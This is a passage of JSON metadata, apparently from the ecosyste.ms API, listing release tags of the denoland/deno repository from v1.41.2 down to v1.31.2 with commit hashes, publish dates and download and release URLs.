null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denolan